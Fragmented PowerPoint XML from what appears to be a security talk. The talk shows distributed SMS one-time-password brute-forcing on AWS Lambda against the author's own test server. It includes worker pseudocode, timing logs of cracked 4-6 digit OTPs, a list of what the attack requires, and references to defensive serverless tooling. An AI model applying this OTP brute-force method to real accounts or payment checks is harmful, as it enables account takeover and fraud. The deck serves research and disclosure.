          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2445147" y="2519100"/>
            <a:ext cx="4467978" cy="15461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9" name="Shape 379"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="357" idx="2"/>
            <a:endCxn id="376" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7506200" y="3001000"/>
            <a:ext cx="0" cy="11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0" name="Shape 380"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="360" idx="1"/>
            <a:endCxn id="355" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1782411" y="1415362"/>
            <a:ext cx="2400614" cy="2381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 txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1919325" y="1706334"/>
            <a:ext cx="1375200" cy="1373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8) Report correct </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>OTP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9) Report brute force complete</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Shape 373"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3841149" y="792269"/>
            <a:ext cx="633925" cy="620825"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="0" t="0" r="0" b="0"/>
            <a:pathLst>
              <a:path w="25357" h="24833" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="13866" y="24833"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="11555" y="23130"/>
                  <a:pt x="216" y="18753"/>
                  <a:pt x="4" y="14619"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-208" y="10484"/>
                  <a:pt x="8363" y="635"/>
                  <a:pt x="12589" y="27"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16814" y="-581"/>
                  <a:pt x="23229" y="9147"/>
                  <a:pt x="25357" y="1097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App Engine (1/2)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need a test server that can handle 1,000,000 requests in 60 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~16,667 requests/second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instances to handle the requests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8750"/>
            <a:ext cx="1945500" cy="137289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5517300" y="1383050"/>
            <a:ext cx="3315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875" y="2438750"/>
            <a:ext cx="1840675" cy="227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599" y="1017725"/>
            <a:ext cx="4761275" cy="21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600" y="3468660"/>
            <a:ext cx="4527599" cy="9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Servers are dead...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“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1" dirty="0"/>
              <a:t>Serverless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="en" sz="1800" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="76" name="Shape 76" descr="google_ad_runcode.notservers.serverlesscompu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26" y="1152476"/>
            <a:ext cx="4339875" cy="9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r="69287"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="2385425"/>
            <a:ext cx="2379175" cy="24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gcp.serverles.economi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224" y="2279100"/>
            <a:ext cx="5586749" cy="127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gcp.justaddco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224" y="3653025"/>
            <a:ext cx="5586750" cy="1221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5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App Engine (2/2)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75" y="1231050"/>
            <a:ext cx="50673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65" y="2869025"/>
            <a:ext cx="63722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589300" y="1231050"/>
            <a:ext cx="3243000" cy="96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Memcache </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>backend: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Check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>if OTP guess is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>correct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Track </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>OTP guesses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7" y="3827200"/>
            <a:ext cx="21240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925425" y="4035250"/>
            <a:ext cx="2724900" cy="46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gcloud app deploy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725" y="3847575"/>
            <a:ext cx="1540025" cy="8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Function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cat ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0"/>
              <a:t>trigger_worker_aws.py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# setup test server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https://otp.appspot.com/?setotp=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>” + random(...)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start_time = datetime(...)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def</a:t>
            </a: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wait_for_result</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>(...)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Elasticsearch(...).get(...)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="4572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time.sleep(1)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print(“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OTP is 123456 \o/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>”)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i="1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# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1" dirty="0"/>
              <a:t>invoke Lambda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1" dirty="0" smtClean="0"/>
              <a:t>function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multiprocessing.Pool(...)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boto3.client('lambda').invoke(...)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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wait_for_result</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>(...)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print(“time taken:” + datetime(...) - start_time )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cat ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>worker.py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*Python multiprocessing Pool and Queue won't work on AWS Lambda*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lambda_handler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>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brute_otp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>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multiprocessing.Process(brute_otp_run, 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brute_otp_run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>(...)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response = requests.get(url+otp)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success_match in response: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FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>add_result_to_es</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>(response)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done_match in response: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FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>add_job_to_es</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>(response)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add_result_to_es</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>(...)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add_job_to_es</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>(...)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6700" cy="3416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https://smsotp.appspot.com/?setotp=013370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Stored OTP: 013370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Enter the OTP in the parameter 'otp'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otp guessed: 0/1000000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https://smsotp.appspot.com/?otp=123456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Stored OTP: 013370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OTP is wrong, try again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otp guessed: 1/1000000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https://smsotp.appspot.com/?otp=013370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Stored OTP: 013370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Success the correct OTP is: 013370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otp guessed: 2/1000000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550" y="1152475"/>
            <a:ext cx="4056750" cy="2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4775475" y="3659150"/>
            <a:ext cx="4056900" cy="62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Now we have a working test server to simulate the brute force attack within 100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4 digits - 100 workers (100/worker)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4]===========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4 - OTP value is: 8763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100.0 workers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en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4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7.14285714286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16:28:29.478689 -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91ada05a-eea6-4eb6-b79b-78fe8a347ee1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16:28:29.480830 -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16:28:29.484356 -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16:28:31.547423 -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2.066530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16:28:41.808053 -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u'8763'}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12.329502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16:28:41.811278 -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16:28:56.023307 -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26.544594</a:t>
            </a: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26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4 digits - 200 workers (50/worker)</a:t>
            </a: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4]===========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4 - OTP value is: 2577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200.0 workers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en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4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50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14.2857142857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16:27:42.543748 -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0bd95391-641b-4c28-b618-634bda7941e5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16:27:42.546869 -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16:27:42.550619 -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16:27:44.694512 -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2.147645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16:27:53.474901 -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u'2577'}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10.931181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16:27:53.478134 -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16:27:54.327960 -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11.784056</a:t>
            </a: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11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4 digits - 400 workers (25/worker)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4]===========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4 - OTP value is: 2167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400.0 workers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4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25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28.5714285714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16:26:58.884780 -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685b617a-9986-4f6f-bd1a-4f563f545b58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16:26:58.888718 -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16:26:58.892609 -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16:27:01.999699 -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3.111037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16:27:04.825824 -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u'2167'}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5.941202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16:27:04.829593 -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16:27:06.544043 -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7.659145</a:t>
            </a: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</a:rPr>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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Brute-force 5 digits - 1,000 workers (100/worker)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5]===========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5 - OTP value is: 92827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1000.0 workers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5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71.4285714286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16:22:49.462012 -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8fc3d024-ba49-4ecb-ada0-5660935a87bf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16:22:49.468667 -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16:22:49.470290 -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16:22:55.765072 -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6.296480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16:23:10.736533 -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u'92827'}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21.274614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16:23:10.739454 -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16:24:30.031556 - job completed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1:40.569551</a:t>
            </a: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100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5 digits - 2,000 workers (50/worker)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5]===========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5 - OTP value is: 15202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2000.0 workers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en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5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50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142.857142857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16:15:41.324104 -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be84d27a-bd77-4dde-95a1-802dde9796fa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16:15:41.336814 -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16:15:41.339787 -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16:15:47.890910 -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u'15202'}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6.567002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16:15:51.180059 -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9.843286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16:15:51.180274 -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16:16:53.400075 -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1:12.075939</a:t>
            </a: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72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5 digits - 4,000 workers (25/worker)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5]===========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5 - OTP value is: 36033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4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4000.0 workers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1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to guess otp [0-9] of length 5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25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285.714285714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16:14:25.121882 -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8c903f9d-8036-41a2-b9f8-8444b9e2523d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16:14:25.131402 -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16:14:25.133104 -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16:14:36.006256 -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u'36033'}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10.884596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16:14:43.876436 -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18.745044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16:14:43.876572 -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16:14:49.328035 -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24.206181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Shape 468"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6017100" y="3384000"/>
            <a:ext cx="2133300" cy="8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1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ry all values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24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6 digits - 10,000 workers (100/worker)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132103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10000.0 workers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to guess otp [0-9] of length 6 with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100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32 processes to start 714.285714286 workers for each of the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16:29:46.701166 -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Started job id: 70961810-964d-4b62-8c34-8b4dbd9e3e0b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16:29:46.732705 -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16:29:46.735767 -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16:30:17.796209 -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{u'otp_value': u'132103'}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31.097981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16:30:33.161660 -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finished starting workers in 0:00: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46.429033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16:30:33.161845 -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2017-07-09 16:33:30.035312 -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3:43.334052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093375" y="3825150"/>
            <a:ext cx="2157600" cy="63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~500k attempts in first 60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50" y="1159399"/>
            <a:ext cx="7272076" cy="36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546600" y="4844625"/>
            <a:ext cx="25974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Source: https://intl.aliyun.com/forum/read-499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3287351" y="589519"/>
            <a:ext cx="1383000" cy="4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Microservices</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="88" name="Shape 88"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="87" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3044351" y="802969"/>
            <a:ext cx="243000" cy="3273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" name="Shape 89"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6767025" y="582575"/>
            <a:ext cx="6384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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="90" name="Shape 90"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6551600" y="916775"/>
            <a:ext cx="379500" cy="6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96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6 digits - 10,000 workers (100/worker)</a:t>
            </a:r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365313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10000.0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workers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to guess otp [0-9] of length 6 with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100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 processes to start 714.285714286 workers for each of the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16:59:26.960930 -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Started job id: 48b6c6d6-23c5-46c9-82b5-171605d9e4b7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16:59:26.980960 -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16:59:26.983994 -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17:00:08.949795 -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{u'otp_value': u'365313'}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found OTP in 0:00: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41.989282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17:00:20.354010 -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finished starting workers in 0:00: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53.373069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17:00:20.354184 -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17:04:14.738054 -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4:47.777224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6593500" y="3616800"/>
            <a:ext cx="1475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</a:rPr>
              <a:t>41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6 digits - 20,000 workers (50/worker)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848028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20000.0 workers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to guess otp [0-9] of length 6 with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50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 processes to start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1666.66666667 workers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for each of the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12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17:31:04.042149 -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Started job id: 3ada0c03-2098-4bb7-81a6-59fc23aa13e4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17:31:04.105770 -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17:31:04.115192 -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17:32:20.495622 -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{u'otp_value': u'848028'}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found OTP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1:16.453610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17:32:41.689405 -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finished starting workers in 0:0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1:37.583704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17:32:41.689607 -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17:33:05.983280 -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2:01.941091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255700" y="3252475"/>
            <a:ext cx="3888300" cy="7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12 regions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Geographically closer to test server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6593500" y="3996175"/>
            <a:ext cx="1475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76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6 digits - 40,000 workers (25/worker)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636555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40000.0 workers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to guess otp [0-9] of length 6 with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25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 processes to start 2857.14285714 workers for each of the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14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17:35:32.440217 -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Started job id: ba9211e5-9f30-4d36-8182-8c1a1638ef6b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17:35:32.512530 -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17:35:32.520186 -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17:36:40.556626 -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{u'otp_value': u'636555'}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found OTP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1:08.116940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17:38:58.294490 -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finished starting workers in 0:0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3:25.782006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17:38:58.294680 -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17:39:40.461517 -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4:08.021226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6593500" y="3616800"/>
            <a:ext cx="1475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68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Brute-force 6 digits - 20,000 workers (50/worker)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080514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Need to spawn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20000.0 workers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to guess otp [0-9] of length 6 with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50 otp per worker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 processes to start 4000.0 workers for each of the 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5 regions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17:43:03.199781 - starting brute_otp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Started job id: 7c632fe4-b75c-4727-939b-bbf0c44acf6b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17:43:03.250565 -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17:43:03.260273 - waiting for answer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17:44:40.776670 - done starting workers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finished starting workers in 0:0</a:t>
            </a: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1:37.526133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17:44:44.977822 - got answer from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{u'otp_value': u'080514'}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found OTP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1:41.778138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17:44:44.985564 - waiting for job to complete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2017-07-09 17:45:21.050496 - job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brute_otp finished in 0:0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en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2:17.850548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6038050" y="2199900"/>
            <a:ext cx="3042600" cy="12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5 regions (same geo area)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Some requests dropped by overloaded test server :(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6617225" y="3846000"/>
            <a:ext cx="1673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101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Brute-force 6 digits - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>40,000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>workers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>(25/worker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>)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======[OTP LENGTH 6]===========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setting random OTP value of length: 6 - OTP value is: 661226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server is ready, starting brute force of OTP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32 processes to start 7.14285714286 workers for each of the 14 regions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will trigger 40000 instances of lambda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continue?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18:18:41.181215 - starting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>brute_otp</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG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Started job id: b6c5032a-0263-4421-8c27-67965b295737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18:18:41.193053 - starting workers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18:18:41.194950 - waiting for answer in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>elasticsearch</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG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18:18:49.840706 - done starting workers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finished starting workers in 8.647686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18:19:10.796215 - got answer from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>elasticsearch</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG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SG" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>u'otp_value</a:t>
            </a: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': u'661226'}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found OTP in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="12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29.615085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sz="1200" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>2017-07-28 18:19:10.799785 - waiting for job to complete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6617225" y="3846000"/>
            <a:ext cx="1673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0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>29 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr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34425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 digit OTP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Test server: Google App Engine (Python) with 200 instances of type B1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Possible to guess OTP based on ~500k attempts in 60 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Requirements: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Font typeface="Consolas"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0"/>
              <a:t>The ability to keep guessing (no account lockout)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Font typeface="Consolas"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0"/>
              <a:t>Server that can handle 10k requests per second (~16.6k in theory)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Font typeface="Consolas"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0"/>
              <a:t>Best if attack comes from same geographic region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Font typeface="Consolas"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0"/>
              <a:t>Need a bit of luck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50" y="3258373"/>
            <a:ext cx="6654149" cy="16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https://github.com/ryanbaxendale/thunderstruck-demo/tree/master/sms.otp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Verified by Visa Acquirer and Merchant Implementation Guide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6: Merchant Server Plug-In Functions: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Payer Authentication Request/Response message pair has a recommended timeout value of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" u="sng"/>
              <a:t>5 minutes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>, recognizing that cardholders may become distracted while completing the authentication.”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Going further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8 digit SMS OTP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3 minutes (180 seconds)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Need a more scalable test server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 attacks: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Unauth password reset URLs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Account signup/registration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387" y="2506521"/>
            <a:ext cx="3869924" cy="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4586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Further work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395" y="1007775"/>
            <a:ext cx="4170624" cy="312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1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Interesting talks</a:t>
            </a:r>
            <a:endParaRPr lang="en" dirty="0"/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311700" y="1092200"/>
            <a:ext cx="3557567" cy="347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33c3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>2016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Gone in 60 Milliseconds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Intrusion and Exfiltration in Server-less Architectures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Rich Jones</a:t>
            </a:r>
            <a:endParaRPr i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/>
              <a:t>Blackhat US 2016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b="1" dirty="0"/>
              <a:t>Account Jumping Post Infection Persistency &amp; Lateral Movement In AWS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Dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" i="1" dirty="0" smtClean="0"/>
              <a:t>Amiga &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" i="1" dirty="0" err="1"/>
              <a:t>Dor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Knafo</a:t>
            </a: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-SG" i="1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i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="475" name="Shape 475"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4394200" y="1092200"/>
            <a:ext cx="4438100" cy="347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dirty="0" err="1" smtClean="0"/>
              <a:t>BSidesLV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" dirty="0" smtClean="0"/>
              <a:t> 2017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b="1" dirty="0" smtClean="0"/>
              <a:t>YARA-as-a-Service </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" b="1" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" b="1" dirty="0" err="1"/>
              <a:t>YaaS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" b="1" dirty="0"/>
              <a:t>): Real-Time </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" b="1" dirty="0" err="1"/>
              <a:t>Serverless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" b="1" dirty="0"/>
              <a:t> Malware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" b="1" dirty="0" smtClean="0"/>
              <a:t>Detection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dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>github.com/airbnb/binaryalert</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG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/>
              <a:t>Austin Byers</a:t>
            </a:r>
            <a:endParaRPr lang="en" i="1" dirty="0" smtClean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endParaRPr lang="en" dirty="0"/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dirty="0" smtClean="0"/>
              <a:t>Blackhat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>US 2017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" b="1" dirty="0"/>
              <a:t>Hacking Serverless Runtimes: Profiling AWS Lambda Azure Functions and more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 smtClean="0"/>
              <a:t>Andrew Krug </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" i="1" dirty="0"/>
              <a:t>&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" i="1" dirty="0" smtClean="0"/>
              <a:t>Graham </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" i="1" dirty="0"/>
              <a:t>Jones</a:t>
            </a:r>
            <a:endParaRPr lang="en" i="1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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>CON 25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Starting the Avalanche: Application DoS In Microservice </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0" smtClean="0"/>
              <a:t>Architectures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SG" i="1" dirty="0" smtClean="0"/>
              <a:t>Scott </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" i="1" dirty="0"/>
              <a:t>Behrens, Jeremy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" i="1" dirty="0" smtClean="0"/>
              <a:t>Heffner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21724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Real-time File Processing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4" y="1532200"/>
            <a:ext cx="6762575" cy="26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439700" y="4845900"/>
            <a:ext cx="1704300" cy="29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https://aws.amazon.com/lambda/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40060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Going further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9299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 - High mem: 1536 MB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266,667/seconds/month free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Aliyun / Alibaba Cloud - China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to register with +86 mobile number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IBM OpenWhisk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4832400" y="2844050"/>
            <a:ext cx="3999900" cy="190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Build your own FaaS infrastructure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github.com/alexellis/faas</a:t>
            </a:r>
            <a:endParaRPr lang="en" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="hlink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UI portal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Setup </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>with one </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>script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Any </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>process that can run in Docker can be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>a serverless function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Prometheus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>metrics and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>logging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Auto-scales </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>as demand increases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50" y="819424"/>
            <a:ext cx="3754207" cy="20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 rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="27756"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="606285" y="3150094"/>
            <a:ext cx="3219000" cy="165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8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2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="231400" y="4491275"/>
            <a:ext cx="8304000" cy="5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github.com/ryanbaxendale/thunderstruck-demo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7555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Scale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https://github.com/airbnb/streamalert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StreamAlert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t> is a serverless, realtime data analysis framework which empowers you to ingest, analyze, and alert on data from any environment, using datasources and alerting logic you define.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https://github.com/0x4D31/honeyLambda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honeyλ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t> - a simple serverless application designed to create and monitor URL {honey}tokens, on top of AWS Lambda and Amazon API Gateway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https://github.com/goadapp/goad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Goad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t> is an AWS Lambda powered, highly distributed, load testing tool built in Go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https://github.com/davbo/lambda-csp-report-uri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Simple python application which runs on AWS Lambda and writes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" i="1"/>
              <a:t>CSP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t> reports into S3 for later processing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https://github.com/therefromhere/csp_lambda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AWS Lambda function to store </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" i="1"/>
              <a:t>Content Security Policy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t> reports in ElasticSearch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8">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="38898" t="11842" r="38569" b="10853"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4492575" y="3199575"/>
            <a:ext cx="798276" cy="136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4225" y="3447672"/>
            <a:ext cx="1791225" cy="4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8825" y="3250669"/>
            <a:ext cx="798275" cy="1318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3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350" y="1991599"/>
            <a:ext cx="6441848" cy="31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Automate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926900"/>
            <a:ext cx="3885000" cy="35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https://github.com/marekq/aws-lambda-firewall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Create </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" i="1"/>
              <a:t>temporary security groups on your EC2 instances</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t> through a simple API call. In addition, audit your security groups easily by the use of automated reports written to S3.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https://github.com/ilijamt/lambda_security_group_manager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Auto </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" i="1"/>
              <a:t>managing your AWS security groups</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t> with Lambda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607575" y="926900"/>
            <a:ext cx="4412100" cy="106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https://github.com/johnmccuk/cloudflare-ip-security-group-update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Lambda function to retrieve </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" i="1"/>
              <a:t>Cloudflare's IP address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t> list and update the specified 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8083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31" y="1000074"/>
            <a:ext cx="5937519" cy="39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 WAF Automation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217100"/>
            <a:ext cx="2826900" cy="375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https://aws.amazon.com/answers/security/aws-waf-security-automations/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application logs and trigger WAF rules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Honeypot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parsing (db scraping)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third party IP reputation lists</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
